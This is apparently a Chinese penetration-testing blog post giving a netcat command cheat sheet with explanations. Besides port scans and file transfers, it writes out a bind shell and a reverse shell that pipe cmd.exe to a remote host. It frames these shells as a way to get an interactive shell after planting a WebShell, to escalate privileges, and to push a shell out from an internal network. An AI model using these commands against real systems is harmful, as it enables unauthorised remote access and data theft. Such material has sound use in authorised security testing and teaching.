NC 瑞士军刀命令行全解

渗透测试 2016-07-07 01:00 暂无评论

文章是转过来的。具体出处也不是很清楚了(稍有改动)

本地运行:nc -v 10.10.10.10 80
命令解释:扫描 IP 10.10.10.10 的 80 端口并且输出详细信息。

本地运行:nc -v -z 10.10.10.10 80-100
命令解释:扫描 IP 10.10.10.10 的 80 到 100 端口,并且输出详细信息,扫描速度较慢。

本地运行:nc -v -z -u 10.10.10.10 80-100
命令解释:扫描 IP 10.10.10.10 的 UDP 80 到 100 端口,并且输出详细信息,扫描速度较慢。

本地运行:nc -l -p 8080
命令解释:监听本地 TCP 8080 端口。

本地运行:nc -l -v -p 8080
命令解释:监听本地 TCP 8080 端口,并且输出监听详细信息到当前窗口。

本地运行:nc -l -p 8080 > C:\logs.txt
命令解释:监听本地 TCP 8080 端口,并且将监听信息输出到 C:\logs.txt 中。

本地运行:nc -nvv 10.10.10.10 8080
命令解释:连接到 10.10.10.10 主机的 8080 端口。

本地运行:nc -nvv -w2 -z 10.10.10.10 80-100
命令解释:扫描 10.10.10.10 的 80 到 100 端口,连接超时时间为 2 秒。

远程运行:nc -l -p 8080 -t -e cmd.exe
命令解释:监听本地 8080 端口并将 cmd.exe 数据重定向至 8080 端口。
本地运行:nc -vv 10.10.10.10 8080
命令解释:正向链接至 10.10.10.10 主机的 8080 端口,并且得到远程主机 10.10.10.10 的 CMD SHELL。
作用:得到一个 cmdshell 可以交互,运用于 WebShell 中更方便提权。

本地运行:nc -l -p 8080
命令解释:监听本地 8080 端口等待主机连接。
远程运行:nc -t -e cmd.exe 10.10.10.11 8080
命令解释:反向连接至本地主机 8080 端口并且将 cmd 反弹至本地。
作用:当主机处于内网状态并且可以访网络时,可以将本地 cmd 反弹至一台外网主机上得到一个反弹 CMD SHELL。

远程运行:nc -v -l -p 8080 > C:/logs.txt
命令解释:监听本地 8080 端口并且等待接收主机发送过来的 logs.txt 文件并且保存在 C 盘。
本地运行:nc -v -n 10.10.10.11 8080 < C:/logs.txt
命令解释:将 C:\logs.txt 的内容发送到 10.10.10.11 主机的 8080 端口。
作用:用于接收传输文件,正反向与反弹 CMD SHELL 用法应该是一样的。

更多姿势还是看一下 nc 的文档吧

暂无评论